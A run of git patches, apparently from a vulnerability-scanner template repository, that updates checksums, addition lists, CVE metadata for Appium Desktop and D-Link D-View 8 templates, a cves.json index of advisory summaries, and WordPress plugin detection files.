Subject: [PATCH 0541/1090] Auto Generated New Template Addition List [Tue Sep
 26 15:40:23 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 702c5ee701..7a445e9a4c 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+http/cves/2023/CVE-2023-2479.yaml
 http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-36845.yaml
 http/cves/2023/CVE-2023-42442.yaml

From d5c5ebd33fb2c8e6e15bb95dcfdfb357d17b2a9b Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 15:40:27 +0000
Subject: [PATCH 0542/1090] Auto Generated Templates Checksum [Tue Sep 26
 15:40:27 UTC 2023] :robot:

---
 templates-checksum.txt | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index c58d17cb1e..5a0908491c 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2540,6 +2540,7 @@ http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832
 http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5
 http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826
 http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1
+http/cves/2023/CVE-2023-2479.yaml:6cfd1b29cde0f44fa2a4f6cbcd2a0a061f146d4a
 http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a
 http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99
 http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44
@@ -4522,7 +4523,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:d9b8f35bbf4
 http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957d65fa62b0a194427d6
 http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc
 http/misconfiguration/installer/nopcommerce-installer.yaml:4568895e83d6888dd2e4eefb6df641258b227f79
-http/misconfiguration/installer/ojs-installer.yaml:a8737d5a86376bda445e5fe2c141143a79cf5e29
+http/misconfiguration/installer/ojs-installer.yaml:7317b5f8e060b50bc6d4c41a04f529ac758b12ed
 http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14
 http/misconfiguration/installer/openshift-installer-panel.yaml:d8a752d34b8064b82613b1fdd6c70c3dc16bb6ff
 http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a
@@ -7192,7 +7193,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:c231fe51c6ebce79078483d2407f8f3ba3cefd42
+templates-checksum.txt:33a2e83e365b1af1d3d690113fb4f5888a24aeb6
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From eec309f75f4b648daad0e33a887126bb7352e947 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 15:42:16 +0000
Subject: [PATCH 0543/1090] TemplateMan Update [Tue Sep 26 15:42:15 UTC 2023]
 :robot:

---
 http/cves/2023/CVE-2023-2479.yaml | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
index 3fa45b321e..5339dfe1c3 100644
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -6,18 +6,19 @@ info:
   severity: critical
   description: |
     OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
+    - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
   remediation: Fixed in v1.22.3-4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-2479
     cwe-id: CWE-78
-    epss-score: 0.0008
-    epss-percentile: 0.3333
     cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
-    - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
+    epss-score: 0.0008
+  metadata:
+    max-request: 1
   tags: cve,cve2023,appium,oast,rce
 
 http:

From 3b789d908b630feb99d1ee2839dc9e3ff4ba968f Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 26 Sep 2023 21:13:29 +0530
Subject: [PATCH 0544/1090] Update CVE-2023-5074.yaml

---
 http/cves/2023/CVE-2023-5074.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
index 46e76b4bf8..4419bdc1dd 100644
--- a/http/cves/2023/CVE-2023-5074.yaml
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-5074
 
 info:
-  name: Authentication Bypass in D-Link D-View 8
+  name:  D-Link D-View 8 v2.0.1.28 - Authentication Bypass
   author: DhiyaneshDK
   severity: critical
   description: |

From 5f4f590e7f58e1a2e3fc9157f4148cbe82d14439 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 26 Sep 2023 21:16:55 +0530
Subject: [PATCH 0545/1090] Update CVE-2023-5074.yaml

---
 http/cves/2023/CVE-2023-5074.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
index 4419bdc1dd..f84d30e121 100644
--- a/http/cves/2023/CVE-2023-5074.yaml
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-5074
 
 info:
-  name:  D-Link D-View 8 v2.0.1.28 - Authentication Bypass
+  name:  D-Link D-View 8 - Authentication Bypass
   author: DhiyaneshDK
   severity: critical
   description: |

From 17669c7fd87a74e329182c6778dee7307541cebd Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 26 Sep 2023 21:21:03 +0530
Subject: [PATCH 0546/1090] lint -fix

---
 http/cves/2023/CVE-2023-5074.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
index f84d30e121..d6b876e592 100644
--- a/http/cves/2023/CVE-2023-5074.yaml
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-5074
 
 info:
-  name:  D-Link D-View 8 - Authentication Bypass
+  name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass
   author: DhiyaneshDK
   severity: critical
   description: |

From 92df843a93c98d9fc9a9da0c31e07d17aa574b0f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 15:54:33 +0000
Subject: [PATCH 0547/1090] Auto Generated New Template Addition List [Tue Sep
 26 15:54:33 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 7a445e9a4c..9442a7afae 100644
--- a/.new-additions
+++ b/.new-additions
@@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-36845.yaml
 http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-4568.yaml
+http/cves/2023/CVE-2023-5074.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml

From f112d03d0019d4641a98916267ea53972d7dfac8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 15:54:33 +0000
Subject: [PATCH 0548/1090] Auto Generated cves.json [Tue Sep 26 15:54:33 UTC
 2023] :robot:

---
 cves.json              | 3 +++
 cves.json-checksum.txt | 2 +-
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 78099bc39d..90a1d52a17 100644
--- a/cves.json
+++ b/cves.json
@@ -1915,6 +1915,7 @@
 {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"}
 {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"}
 {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
+{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"}
 {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
 {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
 {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
@@ -2000,6 +2001,7 @@
 {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
 {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
 {"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
+{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"medium","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
 {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
 {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS  \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"}
 {"ID":"CVE-2023-37266","Info":{"Name":"CasaOS  \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"}
@@ -2030,6 +2032,7 @@
 {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
+{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
 {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
 {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
 {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 8d2d832d28..554cdd5d98 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-39c60027acb5b66e6e4bb6ad252d317f
+6746b8c9a4fa68a5263fab717bdaed2f

From bb62256dceeb11f43cde6472b74bb377faade901 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 15:55:35 +0000
Subject: [PATCH 0549/1090] Auto Generated Templates Checksum [Tue Sep 26
 15:55:35 UTC 2023] :robot:

---
 templates-checksum.txt | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5a0908491c..89cd2afb29 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2540,7 +2540,7 @@ http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832
 http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5
 http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826
 http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1
-http/cves/2023/CVE-2023-2479.yaml:6cfd1b29cde0f44fa2a4f6cbcd2a0a061f146d4a
+http/cves/2023/CVE-2023-2479.yaml:ea2e5aa5a99963579d74b5a1b0521c6450e7ec48
 http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a
 http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99
 http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44
@@ -2657,6 +2657,7 @@ http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd
 http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
+http/cves/2023/CVE-2023-5074.yaml:439a4e67d8763ee84d57902b062f1fc464e11453
 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d
 http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2
 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6
@@ -7193,7 +7194,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:33a2e83e365b1af1d3d690113fb4f5888a24aeb6
+templates-checksum.txt:6974e374bee15047e629369d2bfa5073d4a50bbc
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 898e468d2c19a96aa88356ef48913b5657e29d45 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 04:02:06 +0000
Subject: [PATCH 0550/1090] Auto WordPress Plugins Update [Wed Sep 27 04:02:06
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/admin-menu-editor.txt                | 2 +-
 helpers/wordpress/plugins/astra-sites.txt                      | 2 +-
 helpers/wordpress/plugins/pixelyoursite.txt                    | 2 +-
 helpers/wordpress/plugins/premium-addons-for-elementor.txt     | 2 +-
 helpers/wordpress/plugins/sg-cachepress.txt                    | 2 +-
 helpers/wordpress/plugins/sg-security.txt                      | 2 +-
 helpers/wordpress/plugins/woocommerce-payments.txt             | 2 +-
 helpers/wordpress/plugins/woocommerce-paypal-payments.txt      | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml           | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml            | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml     | 1 -
 .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml               | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml        | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml   | 1 -
 .../wordpress/plugins/all-in-one-wp-migration.yaml             | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
 http/technologies/wordpress/plugins/amp.yaml                   | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml          | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml         | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml           | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml              | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml    | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml         | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml      | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml   | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml            | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml        | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml       | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml          | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                  | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml              | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml         | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml           | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml        | 1 -
 .../wordpress/plugins/contact-form-7-honeypot.yaml             | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml        | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml    | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml       | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml         | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml    | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml   | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml         | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml   | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml      | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml     | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml            | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml     | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml         | 1 -
 .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml      | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml       | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml  | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml     | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml     | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml              | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml            | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml          | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml         | 1 -
 http/technologies/wordpress/plugins/formidable.yaml            | 1 -
 http/technologies/wordpress/plugins/forminator.yaml            | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml   | 1 -
 .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml   | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml      | 1 -
 .../wordpress/plugins/google-listings-and-ads.yaml             | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml       | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml            | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml            | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml             | 1 -
 .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml          | 1 -
 .../wordpress/plugins/header-footer-elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml         | 1 -
 http/technologies/wordpress/plugins/health-check.yaml          | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml           | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml   | 1 -
 http/technologies/wordpress/plugins/imagify.yaml               | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml              | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml          | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml        | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml         | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml            | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml         | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml               | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml        | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                 | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml       | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml  | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml        | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml             | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml      | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml              | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml           | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml          | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml      | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml              | 1 -
 http/technologies/wordpress/plugins/members.yaml               | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml              | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml             | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml            | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml            | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml       | 1 -
